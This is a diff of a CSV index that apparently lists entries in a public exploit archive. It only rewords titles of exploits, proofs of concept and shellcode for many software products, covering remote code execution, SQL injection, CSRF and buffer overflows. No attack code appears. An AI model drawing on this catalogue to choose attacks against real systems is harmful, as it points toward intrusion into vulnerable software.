(Win32)",2010-09-20,metasploit,windows,remote,0 @@ -14670,7 +14670,7 @@ id,file,description,date,author,platform,type,port 16886,platforms/cgi/webapps/16886.rb,"AWStats (6.4-6.5) migrate Remote Command Execution",2010-07-03,metasploit,cgi,webapps,0 16887,platforms/linux/remote/16887.rb,"HP Openview connectedNodes.ovpl Remote Command Execution",2010-07-03,metasploit,linux,remote,0 16888,platforms/linux/remote/16888.rb,"SquirrelMail PGP Plugin command execution (SMTP)",2010-08-25,metasploit,linux,remote,0 -16889,platforms/linux/webapps/16889.rb,"Redmine SCM Repository (0.9.x, 1.0.x) Arbitrary Command Execution",2011-01-08,metasploit,linux,webapps,0 +16889,platforms/linux/webapps/16889.rb,"Redmine SCM Repository 0.9.x, 1.0.x - Arbitrary Command Execution",2011-01-08,metasploit,linux,webapps,0 16890,platforms/php/webapps/16890.rb,"phpBB viewtopic.php Arbitrary Code Execution",2010-07-03,metasploit,php,webapps,0 16891,platforms/cgi/webapps/16891.rb,"QuickTime Streaming Server parse_xml.cgi Remote Execution",2010-07-03,metasploit,cgi,webapps,0 16892,platforms/php/webapps/16892.rb,"TWiki History TWikiUsers rev Parameter Command Execution",2010-07-03,metasploit,php,webapps,0 @@ -14704,7 +14704,7 @@ id,file,description,date,author,platform,type,port 16922,platforms/linux/remote/16922.rb,"UnrealIRCD 3.2.8.1 Backdoor Command Execution",2010-12-05,metasploit,linux,remote,0 16923,platforms/hardware/webapps/16923.rb,"ContentKeeper Web Remote Command Execution",2010-10-09,metasploit,hardware,webapps,0 16924,platforms/linux/remote/16924.rb,"ClamAV Milter Blackhole-Mode Remote Code Execution",2010-10-09,metasploit,linux,remote,0 -16925,platforms/linux/remote/16925.rb,"Exim4 <= 4.69 string_format Function Heap Buffer Overflow",2010-12-16,metasploit,linux,remote,0 +16925,platforms/linux/remote/16925.rb,"Exim4 <= 4.69 - string_format Function Heap Buffer Overflow",2010-12-16,metasploit,linux,remote,0 16926,platforms/windows/remote/16926.rb,"Mercantec SoftCart CGI Overflow",2010-09-20,metasploit,windows,remote,0 16927,platforms/hp-ux/remote/16927.rb,"HP-UX LPD Command Execution",2010-10-06,metasploit,hp-ux,remote,0 16928,platforms/linux/remote/16928.rb,"System V Derived /bin/login Extraneous Arguments Buffer Overflow",2010-07-03,metasploit,linux,remote,0 @@ -14724,10 +14724,10 @@ id,file,description,date,author,platform,type,port 16943,platforms/windows/dos/16943.pl,"Movavi VideoSuite 8.0 SlideShow jpg Local Crash PoC",2011-03-08,KedAns-Dz,windows,dos,0 16944,platforms/windows/dos/16944.pl,"Movavi VideoSuite 8.0 Movie Editor avi Local Crash PoC",2011-03-08,KedAns-Dz,windows,dos,0 16945,platforms/hardware/dos/16945.pl,"Nokia N97 m3u Playlist Crash PoC",2011-03-08,KedAns-Dz,hardware,dos,0 -16946,platforms/php/webapps/16946.txt,"RuubikCMS Version 1.0.3 Multiple Vulnerabilities",2011-03-08,IRCRASH,php,webapps,0 +16946,platforms/php/webapps/16946.txt,"RuubikCMS 1.0.3 - Multiple Vulnerabilities",2011-03-08,IRCRASH,php,webapps,0 16947,platforms/php/webapps/16947.txt,"GRAND Flash Album Gallery 0.55 Wordpress Plugin Multiple Vulnerabilities",2011-03-08,"High-Tech Bridge SA",php,webapps,0 -16948,platforms/php/webapps/16948.txt,"Esselbach Storyteller CMS System Version 1.8 SQL Injection Vulnerability",2011-03-09,Shamus,php,webapps,0 -16949,platforms/php/webapps/16949.php,"maian weblog <= v4.0 remote blind SQL injection exploit",2011-03-09,mr_me,php,webapps,0 +16948,platforms/php/webapps/16948.txt,"Esselbach Storyteller CMS System 1.8 - SQL Injection Vulnerability",2011-03-09,Shamus,php,webapps,0 +16949,platforms/php/webapps/16949.php,"maian weblog <= 4.0 - Remote Blind SQL Injection",2011-03-09,mr_me,php,webapps,0 16950,platforms/php/webapps/16950.txt,"RecordPress 0.3.1 Multiple Vulnerabilities",2011-03-09,IRCRASH,php,webapps,0 16951,platforms/bsd/local/16951.c,"FreeBSD <= 6.4 Netgraph Local Privledge Escalation Exploit",2011-03-10,zx2c4,bsd,local,0 16952,platforms/linux/dos/16952.c,"Linux Kernel < 2.6.37-rc2 TCP_MAXSEG Kernel Panic DoS",2011-03-10,zx2c4,linux,dos,0 @@ -14737,7 +14737,7 @@ id,file,description,date,author,platform,type,port 16956,platforms/windows/remote/16956.rb,"Novell iPrint Client ActiveX Control <= 5.52 Buffer Overflow",2011-03-07,metasploit,windows,remote,0 16957,platforms/windows/remote/16957.rb,"Oracle MySQL for Microsoft Windows Payload Execution",2011-03-08,metasploit,windows,remote,0 16959,platforms/multiple/webapps/16959.txt,"Oracle WebLogic Session Fixation Via HTTP POST",2011-03-11,"Roberto Suggi Liverani",multiple,webapps,0 -16960,platforms/linux/dos/16960.txt,"Linux NTP query client v4.2.6p1 Heap Overflow Vulnerability",2011-03-11,mr_me,linux,dos,0 +16960,platforms/linux/dos/16960.txt,"Linux NTP query client 4.2.6p1 - Heap Overflow Vulnerability",2011-03-11,mr_me,linux,dos,0 16961,platforms/php/webapps/16961.py,"N`CMS 1.1E Pre-Auth Local File Inclusion Remote Code Exploit",2011-03-11,TecR0c,php,webapps,0 16962,platforms/asp/webapps/16962.txt,"SmarterStats 6.0 Multiple Vulnerabilities",2011-03-11,"Hoyt LLC Research",asp,webapps,0 16963,platforms/php/webapps/16963.txt,"Constructr CMS 3.03 Miltiple Remote Vulnerabilities",2011-03-11,LiquidWorm,php,webapps,0 @@ -14746,9 +14746,9 @@ id,file,description,date,author,platform,type,port 16966,platforms/linux/dos/16966.php,"PHP <= 5.3.6 shmop_read() Integer Overflow DoS",2011-03-12,"Jose Carlos Norte",linux,dos,0 16968,platforms/php/webapps/16968.txt,"Cover Vision SQL Injection Vulnerability",2011-03-13,Egyptian.H4x0rz,php,webapps,0 16969,platforms/php/webapps/16969.txt,"Log1 CMS 2.0 Multiple Vulnerabilities",2011-03-14,Aodrulez,php,webapps,0 -16970,platforms/windows/remote/16970.rb,"Kolibri <= v2.0 HTTP Server HEAD Buffer Overflow",2011-08-03,metasploit,windows,remote,0 +16970,platforms/windows/remote/16970.rb,"Kolibri <= 2.0 - HTTP Server HEAD Buffer Overflow",2011-08-03,metasploit,windows,remote,0 16971,platforms/windows/local/16971.py,"ABBS Audio Media Player Buffer Overflow Exploit (M3U/LST)",2011-03-14,Rh0,windows,local,0 -16972,platforms/hardware/remote/16972.txt,"checkview v1.1 for iPhone / iPod Touch Directory Traversal",2011-03-14,kim@story,hardware,remote,0 +16972,platforms/hardware/remote/16972.txt,"iOS Checkview 1.1 - Directory Traversal",2011-03-14,kim@story,hardware,remote,0 16973,platforms/linux/dos/16973.c,"Linux <= 2.6.37-rc1 serial_core TIOCGICOUNT Leak Exploit",2011-03-14,prdelka,linux,dos,0 16974,platforms/hardware/remote/16974.html,"Android 2.0 ,2.1, 2.1.1 WebKit Use-After-Free Exploit",2011-03-14,"MJ Keith",hardware,remote,0 16975,platforms/asp/webapps/16975.txt,"SmarterMail 8.0 Multiple XSS Vulnerabilities",2011-03-14,"Hoyt LLC Research",asp,webapps,0 @@ -14767,8 +14767,8 @@ id,file,description,date,author,platform,type,port 16990,platforms/multiple/remote/16990.rb,"Sun Java Applet2ClassLoader Remote Code Execution Exploit",2011-03-16,metasploit,multiple,remote,0 16991,platforms/windows/local/16991.txt,"Microsoft Source Code Analyzer for SQL Injection 1.3 Improper Permissions",2011-03-17,LiquidWorm,windows,local,0 16992,platforms/php/webapps/16992.txt,"Joomla! 1.6 Multiple SQL Injection Vulnerabilities",2011-03-17,"Aung Khant",php,webapps,0 -16993,platforms/hardware/remote/16993.pl,"ACTi ASOC 2200 Web Configurator <= v2.6 Remote Root Command Execution",2011-03-17,"Todor Donev",hardware,remote,0 -16995,platforms/php/webapps/16995.txt,"SQL Injection in component com_booklibrary for Joomla",2011-03-17,"Marc Doudiet",php,webapps,0 +16993,platforms/hardware/remote/16993.pl,"ACTi ASOC 2200 Web Configurator <= 2.6 - Remote Root Command Execution",2011-03-17,"Todor Donev",hardware,remote,0 +16995,platforms/php/webapps/16995.txt,"Joomla com_booklibrary - SQL Injection",2011-03-17,"Marc Doudiet",php,webapps,0 16996,platforms/windows/dos/16996.rb,"Fake Webcam v 6.1 Local Crash PoC",2011-03-17,"Anastasios Monachos",windows,dos,0 16997,platforms/php/webapps/16997.txt,"Tugux CMS 1.0_final Multiple Vulnerabilities",2011-03-17,Aodrulez,php,webapps,0 16998,platforms/windows/remote/16998.rb,"RealNetworks RealPlayer CDDA URI Initialization Vulnerability",2011-03-17,metasploit,windows,remote,0 @@ -14776,7 +14776,7 @@ id,file,description,date,author,platform,type,port 17000,platforms/php/webapps/17000.txt,"Tugux CMS (nid) BLIND Sql Injection Vulnerability",2011-03-18,eidelweiss,php,webapps,0 17001,platforms/windows/local/17001.pl,"CORE Multimedia Suite 2011 CORE Player 2.4 Buffer Overflow (.m3u)",2011-03-18,Rh0,windows,local,0 17002,platforms/php/webapps/17002.txt,"CMS Loko Media Local File Download Vulnerability",2011-03-18,Xr0b0t,php,webapps,0 -17003,platforms/php/webapps/17003.py,"iCMS v1.1 Admin SQLi/Bruteforce Exploit",2011-03-18,TecR0c,php,webapps,0 +17003,platforms/php/webapps/17003.py,"iCMS 1.1 - Admin SQLi/Bruteforce Exploit",2011-03-18,TecR0c,php,webapps,0 17004,platforms/linux/dos/17004.txt,"libzip 0.9.3 _zip_name_locate NULL Pointer Dereference (incl PHP 5.3.5)",2011-03-18,"Maksymilian Arciemowicz",linux,dos,0 17005,platforms/php/webapps/17005.txt,"Kleophatra 0.1.4 0day Arbitrary Upload File Vulnerability",2011-03-19,Xr0b0t,php,webapps,0 17006,platforms/php/webapps/17006.txt,"Balitbang CMS 3.3 Multiple Vulnerabilities",2011-03-19,Xr0b0t,php,webapps,0 @@ -14821,7 +14821,7 @@ id,file,description,date,author,platform,type,port 17048,platforms/windows/remote/17048.rb,"VLC AMV Dangling Pointer Vulnerability",2011-03-26,metasploit,windows,remote,0 17050,platforms/php/webapps/17050.txt,"Family Connections CMS 2.3.2 (POST) Stored XSS And XML Injection",2011-03-26,LiquidWorm,php,webapps,0 17051,platforms/php/webapps/17051.txt,"SimplisCMS 1.0.3.0 Multiple Vulnerabilities",2011-03-27,NassRawI,php,webapps,0 -17053,platforms/windows/remote/17053.txt,"wodWebServer.NET 1.3.3 Directory Traversal",2011-03-27,"AutoSec Tools",windows,remote,0 +17053,platforms/windows/remote/17053.txt,"wodWebServer.NET 1.3.3 - Directory Traversal",2011-03-27,"AutoSec Tools",windows,remote,0 17054,platforms/php/webapps/17054.txt,"webEdition CMS 6.1.0.2 Multiple Vulnerabilities",2011-03-27,"AutoSec Tools",php,webapps,0 17055,platforms/php/webapps/17055.txt,"Honey Soft Web Solution Multiple Vulnerabilities",2011-03-28,**RoAd_KiLlEr**,php,webapps,0 17056,platforms/php/webapps/17056.txt,"Wordpress plugin BackWPup Remote and Local Code Execution Vulnerability",2011-03-28,"Sense of Security",php,webapps,0 @@ -14830,7 +14830,7 @@ id,file,description,date,author,platform,type,port 17061,platforms/php/webapps/17061.txt,"Andy's PHP Knowledgebase Project 0.95.4 SQL Injection",2011-03-29,"AutoSec Tools",php,webapps,0 17062,platforms/php/webapps/17062.txt,"Claroline 1.10 Persistent XSS Vulnerability",2011-03-29,"AutoSec Tools",php,webapps,0 17063,platforms/windows/remote/17063.txt,"Easy File Sharing Web Server 5.8 Multiple Vulnerabilities",2011-03-29,"AutoSec Tools",windows,remote,0 -17064,platforms/windows/local/17064.py,"IDEAL Administration 2011 v11.4 Local SEH Buffer Overflow Exploit",2011-03-29,Dr_IDE,windows,local,0 +17064,platforms/windows/local/17064.py,"IDEAL Administration 2011 11.4 - Local SEH Buffer Overflow Exploit",2011-03-29,Dr_IDE,windows,local,0 17068,platforms/multiple/remote/17068.py,"jHTTPd 0.1a Directory Traversal Vulnerability",2011-03-29,"AutoSec Tools",multiple,remote,0 17069,platforms/php/webapps/17069.txt,"osCSS2 2.1.0 RC12 Multiple Vulnerabilities",2011-03-29,"AutoSec Tools",php,webapps,0 17070,platforms/windows/dos/17070.py,"Rumble 0.25.2232 Denial of Service Vulnerability",2011-03-29,"AutoSec Tools",windows,dos,0 @@ -14850,12 +14850,12 @@ id,file,description,date,author,platform,type,port 17086,platforms/windows/local/17086.pl,"Word List Builder Buffer Overflow Exploit (SEH)",2011-04-01,h1ch4m,windows,local,0 17087,platforms/windows/dos/17087.pl,"Real player 14.0.2.633 0day Buffer overflow/DOS Exploit",2011-04-01,^Xecuti0N3r,windows,dos,0 17089,platforms/windows/dos/17089.pl,"GOM Media Player 2.1.6.3499 0Day Buffer overflow/DOS Exploit",2011-04-01,^Xecuti0N3r,windows,dos,0 -17091,platforms/php/webapps/17091.html,"Allomani E-Store 1.0 XSRF Vulnerability (Add Admin)",2011-04-01,AtT4CKxT3rR0r1ST,php,webapps,0 -17092,platforms/php/webapps/17092.html,"Allomani News 1.0 XSRF Vulnerability (Add Admin)",2011-04-01,AtT4CKxT3rR0r1ST,php,webapps,0 -17093,platforms/php/webapps/17093.html,"Allomani Movies Library 2.0 XSRF Vulnerability (Add Admin)",2011-04-01,AtT4CKxT3rR0r1ST,php,webapps,0 -17094,platforms/php/webapps/17094.html,"Allomani Web Links 1.0 XSRF Vulnerability (Add Admin)",2011-04-01,AtT4CKxT3rR0r1ST,php,webapps,0 -17095,platforms/php/webapps/17095.html,"Allomani Audio and Video Library 2.7.0 XSRF Vulnerability (Add Admin)",2011-04-01,AtT4CKxT3rR0r1ST,php,webapps,0 -17096,platforms/php/webapps/17096.html,"Allomani Super Multimedia Library 2.5.0 XSRF Vulnerability (Add Admin)",2011-04-01,AtT4CKxT3rR0r1ST,php,webapps,0 +17091,platforms/php/webapps/17091.html,"Allomani E-Store 1.0 - CSRF Vulnerability (Add Admin)",2011-04-01,AtT4CKxT3rR0r1ST,php,webapps,0 +17092,platforms/php/webapps/17092.html,"Allomani News 1.0 - CSRF Vulnerability (Add Admin)",2011-04-01,AtT4CKxT3rR0r1ST,php,webapps,0 +17093,platforms/php/webapps/17093.html,"Allomani Movies Library 2.0 - CSRF Vulnerability (Add Admin)",2011-04-01,AtT4CKxT3rR0r1ST,php,webapps,0 +17094,platforms/php/webapps/17094.html,"Allomani Web Links 1.0 - CSRF Vulnerability (Add Admin)",2011-04-01,AtT4CKxT3rR0r1ST,php,webapps,0 +17095,platforms/php/webapps/17095.html,"Allomani Audio and Video Library 2.7.0 - CSRF Vulnerability (Add Admin)",2011-04-01,AtT4CKxT3rR0r1ST,php,webapps,0 +17096,platforms/php/webapps/17096.html,"Allomani Super Multimedia Library 2.5.0 - CSRF Vulnerability (Add Admin)",2011-04-01,AtT4CKxT3rR0r1ST,php,webapps,0 17097,platforms/bsd/dos/17097.c,"IPComp encapsulation pre-auth kernel memory corruption",2011-04-01,"Tavis Ormandy",bsd,dos,0 17098,platforms/php/webapps/17098.txt,"InTerra Blog Machine 1.84 XSS Vulnerability",2011-04-01,"High-Tech Bridge SA",php,webapps,0 17099,platforms/php/webapps/17099.txt,"Feng Office 1.7.3.3 CSRF Vulnerability",2011-04-01,"High-Tech Bridge SA",php,webapps,0 @@ -14879,25 +14879,25 @@ id,file,description,date,author,platform,type,port 17118,platforms/php/webapps/17118.txt,"OpenEMR 4.0.0 Multiple Vulnerabilities",2011-04-05,"AutoSec Tools",php,webapps,0 17119,platforms/php/webapps/17119.txt,"WordPress WP Custom Pages Plugin 0.5.0.1 LFI Vulnerability",2011-04-05,"AutoSec Tools",php,webapps,0 17120,platforms/multiple/dos/17120.c,"GNU glibc < 2.12.2 'fnmatch()' Function Stack Corruption Vulnerability",2011-02-25,"Simon Berry-Byrne",multiple,dos,0 -17123,platforms/php/webapps/17123.txt,"TutorialMS v1.4 (show) Remote SQL Injection Vulnerability",2011-04-05,LiquidWorm,php,webapps,0 +17123,platforms/php/webapps/17123.txt,"TutorialMS 1.4 (show) - Remote SQL Injection Vulnerability",2011-04-05,LiquidWorm,php,webapps,0 17124,platforms/windows/local/17124.pl,"MPlayer (r33064 Lite) Buffer Overflow + ROP exploit",2011-04-06,Nate_M,windows,local,0 17125,platforms/php/webapps/17125.txt,"Dream Vision Technologies Web Portal SQL Injection Vulnerability",2011-04-06,eXeSoul,php,webapps,0 17126,platforms/php/webapps/17126.html,"Graugon Forum 1.3 SQL Injection Vulnerability",2011-04-06,"AutoSec Tools",php,webapps,0 17127,platforms/php/webapps/17127.txt,"eyeOS 2.3 Multiple Vulnerabilities",2011-04-06,"AutoSec Tools",php,webapps,0 17128,platforms/php/webapps/17128.txt,"GreenPants 0.1.7 Multiple Vulnerabilities",2011-04-06,"Ptrace Security",php,webapps,0 17129,platforms/php/webapps/17129.txt,"S40 CMS 0.4.2b LFI Vulnerability",2011-04-07,Osirys,php,webapps,0 -17132,platforms/php/webapps/17132.py,"Joomla! com_virtuemart <= v1.1.7 Blind SQL Injection Exploit",2011-04-08,"TecR0c and mr_me",php,webapps,0 +17132,platforms/php/webapps/17132.py,"Joomla! com_virtuemart <= 1.1.7 - Blind SQL Injection Exploit",2011-04-08,"TecR0c and mr_me",php,webapps,0 17133,platforms/windows/dos/17133.c,"Microsoft Windows xp AFD.sys Local Kernel DoS Exploit",2011-04-08,"Lufeng Li",windows,dos,0 17134,platforms/php/webapps/17134.txt,"phpCollab 2.5 Multiple Vulnerabilities",2011-04-08,"High-Tech Bridge SA",php,webapps,0 17135,platforms/php/webapps/17135.txt,"Viscacha 0.8.1 Multiple Vulnerabilities",2011-04-08,"High-Tech Bridge SA",php,webapps,0 17136,platforms/php/webapps/17136.txt,"Joomla JCE Component (com_jce) Blind SQL Injection Vulnerability",2011-04-09,eidelweiss,php,webapps,0 -17137,platforms/php/webapps/17137.txt,"NooMS CMS version 1.1.1 CSRF",2011-04-09,loneferret,php,webapps,0 +17137,platforms/php/webapps/17137.txt,"NooMS CMS 1.1.1 - CSRF",2011-04-09,loneferret,php,webapps,0 17140,platforms/multiple/dos/17140.txt,"Libmodplug ReadS3M Stack Overflow",2011-04-09,"SEC Consult",multiple,dos,0 -17141,platforms/php/webapps/17141.txt,"Point Market System 3.1x vbulletin plugin SQLi Vulnerability",2011-04-10,Net.Edit0r,php,webapps,0 +17141,platforms/php/webapps/17141.txt,"Point Market System 3.1x vbulletin plugin SQLi Vulnerability",2011-04-10,Net.Edit0r,php,webapps,0 17142,platforms/windows/dos/17142.py,"IrfanView 4.28 - ICO With Transparent Colour DoS & RDoS",2011-04-10,BraniX,windows,dos,0 17143,platforms/windows/dos/17143.py,"IrfanView 4.28 - ICO Without Transparent Colour DoS & RDoS",2011-04-10,BraniX,windows,dos,0 17144,platforms/windows/local/17144.pl,"MikeyZip 1.1 .ZIP File Buffer Overflow",2011-04-10,"C4SS!0 G0M3S",windows,local,0 -17145,platforms/windows/dos/17145.pl,"Vallen Zipper V2.30 .ZIP File Heap Overflow",2011-04-11,"C4SS!0 G0M3S",windows,dos,0 +17145,platforms/windows/dos/17145.pl,"Vallen Zipper 2.30 - (.ZIP) Heap Overflow",2011-04-11,"C4SS!0 G0M3S",windows,dos,0 17146,platforms/php/webapps/17146.txt,"K-Links - Link Directory Script SQL Injection Vulnerability",2011-04-11,R3d-D3v!L,php,webapps,0 17147,platforms/linux/local/17147.txt,"tmux '-S' Option Incorrect SetGID Privilege Escalation Vulnerability",2011-04-11,ph0x90bic,linux,local,0 17148,platforms/multiple/remote/17148.rb,"Zend Server Java Bridge Arbitrary Java Code Execution",2011-04-05,metasploit,multiple,remote,10001 @@ -14916,12 +14916,12 @@ id,file,description,date,author,platform,type,port 17162,platforms/windows/dos/17162.txt,"Microsoft Reader <= 2.1.1.3143 Integer Overflow",2011-04-12,"Luigi Auriemma",windows,dos,0 17163,platforms/windows/dos/17163.txt,"Microsoft Reader <= 2.1.1.3143 Array Overflow",2011-04-12,"Luigi Auriemma",windows,dos,0 17164,platforms/windows/dos/17164.txt,"Microsoft Reader <= 2.1.1.3143 NULL Byte Write",2011-04-12,"Luigi Auriemma",windows,dos,0 -17165,platforms/php/webapps/17165.py,"TinyBB v1.4 Blind Sql Injection and Path Disclosure",2011-04-13,swami,php,webapps,0 -17166,platforms/windows/local/17166.py,"PlaylistMaker V1.5 .txt File Buffer Overflow Vulnerability",2011-04-13,"C4SS!0 G0M3S",windows,local,0 +17165,platforms/php/webapps/17165.py,"TinyBB 1.4 - Blind Sql Injection and Path Disclosure",2011-04-13,swami,php,webapps,0 +17166,platforms/windows/local/17166.py,"PlaylistMaker 1.5 .txt File - Buffer Overflow Vulnerability",2011-04-13,"C4SS!0 G0M3S",windows,local,0 17169,platforms/bsd/local/17169.pl,"NEdit 5.5 Format String Vulnerability",2011-04-14,Tosh,bsd,local,0 17170,platforms/php/webapps/17170.txt,"EZ-Shop 1.02 Lateral SQL Injection Vulnerability",2011-04-14,Osirys,php,webapps,0 17171,platforms/windows/local/17171.pl,"SimplyPlay v.66 .pls File Buffer Overflow Vulnerability",2011-04-14,"C4SS!0 G0M3S",windows,local,0 -17172,platforms/php/webapps/17172.txt,"cPassMan v1.82 Arbitrary File Download",2011-04-15,"Sense of Security",php,webapps,0 +17172,platforms/php/webapps/17172.txt,"cPassMan 1.82 - Arbitrary File Download",2011-04-15,"Sense of Security",php,webapps,0 17173,platforms/php/webapps/17173.txt,"TextAds 2.08 Script Cross Site Scripting Vulnerability",2011-04-15,"Ashiyane Digital Security Team",php,webapps,0 17174,platforms/multiple/webapps/17174.txt,"SQL-Ledger <= 2.8.33 Post-authentication Local File Include/Edit Vulnerability",2011-04-15,bitform,multiple,webapps,0 17175,platforms/windows/remote/17175.rb,"Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability",2011-04-16,metasploit,windows,remote,0 @@ -14960,8 +14960,8 @@ id,file,description,date,author,platform,type,port 17212,platforms/php/webapps/17212.txt,"OrangeHRM 2.6.3 (PluginController.php) Local File Inclusion Vulnerability",2011-04-25,"AutoSec Tools",php,webapps,0 17213,platforms/php/webapps/17213.txt,"phpMyChat Plus 1.93 Multiple Vulnerabilities",2011-04-25,"AutoSec Tools",php,webapps,0 17214,platforms/php/webapps/17214.php,"WordPress SermonBrowser Plugin 0.43 SQL Injection",2011-04-26,Ma3sTr0-Dz,php,webapps,0 -17215,platforms/hardware/webapps/17215.txt,"Snom IP Phone Web Interface < v8 Multiple Vulnerabilities",2011-04-26,"Yakir Wizman",hardware,webapps,0 -17216,platforms/php/webapps/17216.txt,"Quick.CMS v3.0 CSRF Vulnerabilities",2011-04-26,^Xecuti0N3r,php,webapps,0 +17215,platforms/hardware/webapps/17215.txt,"Snom IP Phone Web Interface < 8 - Multiple Vulnerabilities",2011-04-26,"Yakir Wizman",hardware,webapps,0 +17216,platforms/php/webapps/17216.txt,"Quick.CMS 3.0 - CSRF Vulnerabilities",2011-04-26,^Xecuti0N3r,php,webapps,0 17217,platforms/windows/local/17217.py,"Subtitle Processor 7.7.1 SEH Unicode Buffer Overflow Exploit",2011-04-27,"Brandon Murphy",windows,local,0 17218,platforms/php/webapps/17218.txt,"Symphony CMS 2.1.2 Blind SQL Injection",2011-04-27,Wireghoul,php,webapps,0 17219,platforms/windows/remote/17219.rb,"EMC HomeBase Server Directory Traversal Remote Code Execution",2011-04-27,metasploit,windows,remote,18821 @@ -15019,8 +15019,8 @@ id,file,description,date,author,platform,type,port 17296,platforms/php/webapps/17296.txt,"NoticeBoardPro 1.0 Multiple Vulnerabilities",2011-05-16,"AutoSec Tools",php,webapps,0 17297,platforms/php/webapps/17297.txt,"Jcow 4.2.1 LFI Vulnerability",2011-05-16,"AutoSec Tools",php,webapps,0 17298,platforms/netware/dos/17298.txt,"Novell Netware eDirectory DoS Vulnerability",2011-05-16,nSense,netware,dos,0 -17299,platforms/php/webapps/17299.txt,"Is-human <=1.4.2 Wordpress Plugin Remote Command Execution Vulnerability",2011-05-17,neworder,php,webapps,0 -17300,platforms/windows/remote/17300.rb,"7-Technologies IGSS <= v9.00.00 b11063 IGSSdataServer.exe Stack Overflow",2011-05-16,metasploit,windows,remote,0 +17299,platforms/php/webapps/17299.txt,"Wordpress Plugin Is-human <= 1.4.2- Remote Command Execution Vulnerability",2011-05-17,neworder,php,webapps,0 +17300,platforms/windows/remote/17300.rb,"7-Technologies IGSS <= 9.00.00 b11063 - IGSSdataServer.exe Stack Overflow",2011-05-16,metasploit,windows,remote,0 17301,platforms/php/webapps/17301.txt,"Pligg 1.1.4 SQL Injection Vulnerability",2011-05-17,Null-0x00,php,webapps,0 17302,platforms/windows/local/17302.py,"Sonique 1.96 .m3u Buffer Overflow",2011-05-17,sinfulsecurity,windows,local,0 17303,platforms/php/webapps/17303.txt,"Joomla 1.0 Component jDownloads Arbitrary File Upload Vulnerability",2011-05-18,Al-Ghamdi,php,webapps,0 @@ -15028,12 +15028,12 @@ id,file,description,date,author,platform,type,port 17305,platforms/windows/dos/17305.py,"Microsoft Windows Vista/Server 2008 ""nsiproxy.sys"" Local Kernel DoS Exploit",2011-05-18,"Lufeng Li",windows,dos,0 17306,platforms/windows/local/17306.pl,"SpongeBob SquarePants Typing Buffer Overflow (SEH)",2011-05-18,"Infant Overflow",windows,local,0 17307,platforms/php/webapps/17307.txt,"Ultimate PHP Board 2.2.7 Broken Authentication and Session Management",2011-05-20,i2sec,php,webapps,0 -17308,platforms/php/webapps/17308.txt,"Zen Cart <= v1.3.9h Multiple Vulnerabilities",2011-05-20,"Dr. Alberto Fontanella",php,webapps,0 +17308,platforms/php/webapps/17308.txt,"Zen Cart <= 1.3.9h - Multiple Vulnerabilities",2011-05-20,"Dr. Alberto Fontanella",php,webapps,0 17309,platforms/php/webapps/17309.txt,"PHP Captcha / Securimage 2.0.2 - Authentication Bypass - SO-11-007",2011-05-20,"Sense of Security",php,webapps,0 17311,platforms/php/webapps/17311.txt,"E-Manage MySchool 7.02 SQL Injection Vulnerability",2011-05-21,az7rb,php,webapps,0 17312,platforms/php/webapps/17312.txt,"Tugux CMS 1.2 Multiple Remote Vulnerabilities",2011-05-22,LiquidWorm,php,webapps,0 17313,platforms/windows/local/17313.rb,"Magix Musik Maker 16 .mmm Stack Buffer Overflow",2011-05-22,metasploit,windows,local,0 -17314,platforms/php/webapps/17314.txt,"vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability",2011-05-23,D4rkB1t,php,webapps,0 +17314,platforms/php/webapps/17314.txt,"vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability",2011-05-23,D4rkB1t,php,webapps,0 17316,platforms/php/webapps/17316.txt,"PHPortfolio SQL Injection Vulnerbility",2011-05-23,lionaneesh,php,webapps,0 17317,platforms/windows/local/17317.rb,"VisiWave VWR File Parsing Trusted Pointer Vulnerability",2011-05-23,metasploit,windows,local,0 17318,platforms/multiple/local/17318.php,"PHP <= 5.3.5 socket_connect() Buffer Overflow Vulnerability",2011-05-25,"Marek Kroemeke",multiple,local,0 @@ -15042,15 +15042,15 @@ id,file,description,date,author,platform,type,port 17321,platforms/php/webapps/17321.txt,"ExtCalendar 2.0b2 (cal_search.php) SQL Injection Vulnerability",2011-05-25,"High-Tech Bridge SA",php,webapps,0 17322,platforms/php/webapps/17322.txt,"eGroupware 1.8.001.20110421 Multiple Vulnerabilities",2011-05-25,"AutoSec Tools",php,webapps,0 17323,platforms/windows/shellcode/17323.c,"Allwin WinExec add new local administrator + ExitProcess Shellcode",2011-05-25,RubberDuck,windows,shellcode,0 -17324,platforms/php/webapps/17324.rb,"AWStats Totals =< v1.14 multisort Remote Command Execution",2011-05-25,metasploit,php,webapps,0 +17324,platforms/php/webapps/17324.rb,"AWStats Totals <= 1.14 multisort - Remote Command Execution",2011-05-25,metasploit,php,webapps,0 17325,platforms/php/webapps/17325.py,"Clipbucket 2.4 RC2 645 SQL Injection Vulnerability",2011-05-26,"AutoSec Tools",php,webapps,0 17326,platforms/windows/shellcode/17326.rb,"DNS Reverse Download and Exec Shellcode",2011-05-26,"Alexey Sintsov",windows,shellcode,0 17327,platforms/php/webapps/17327.txt,"HB Ecommerce SQL Injection Vulnerability",2011-05-27,takeshix,php,webapps,0 -17328,platforms/windows/remote/17328.html,"Magneto ICMP ActiveX v4.0.0.20 ICMPSendEchoRequest Remote Code Execute",2011-05-27,boahat,windows,remote,0 +17328,platforms/windows/remote/17328.html,"Magneto ICMP ActiveX 4.0.0.20 - ICMPSendEchoRequest Remote Code Execute",2011-05-27,boahat,windows,remote,0 17329,platforms/windows/local/17329.rb,"Magix Musik Maker 16 .mmm Stack Buffer Overflow (w/o egg-hunter)",2011-05-27,"Alexey Sintsov",windows,local,0 17330,platforms/php/webapps/17330.html,"cPanel < 11.25 CSRF - Add User php Script",2011-05-27,ninjashell,php,webapps,0 17335,platforms/php/webapps/17335.txt,"Duhok Forum 1.1 SQL Injection Vulnerability",2011-05-28,M.Jock3R,php,webapps,0 -17336,platforms/php/webapps/17336.txt,"Guru Penny Auction Pro V3 Blind SQL Injection Vulnerability",2011-05-28,v3n0m,php,webapps,0 +17336,platforms/php/webapps/17336.txt,"Guru Penny Auction Pro 3.0 - Blind SQL Injection Vulnerability",2011-05-28,v3n0m,php,webapps,0 17338,platforms/php/webapps/17338.txt,"Joomla Component com_jmsfileseller Local File Inclusion Vulnerability",2011-05-28,Valentin,php,webapps,0 17339,platforms/windows/remote/17339.py,"HP Data Protector Client EXEC_CMD Remote Code Execution PoC (ZDI-11-055)",2011-05-28,fdisk,windows,remote,0 17341,platforms/php/webapps/17341.txt,"Joomla Component com_joomnik SQL Injection Vulnerability",2011-05-29,SOLVER,php,webapps,0 @@ -15061,12 +15061,12 @@ 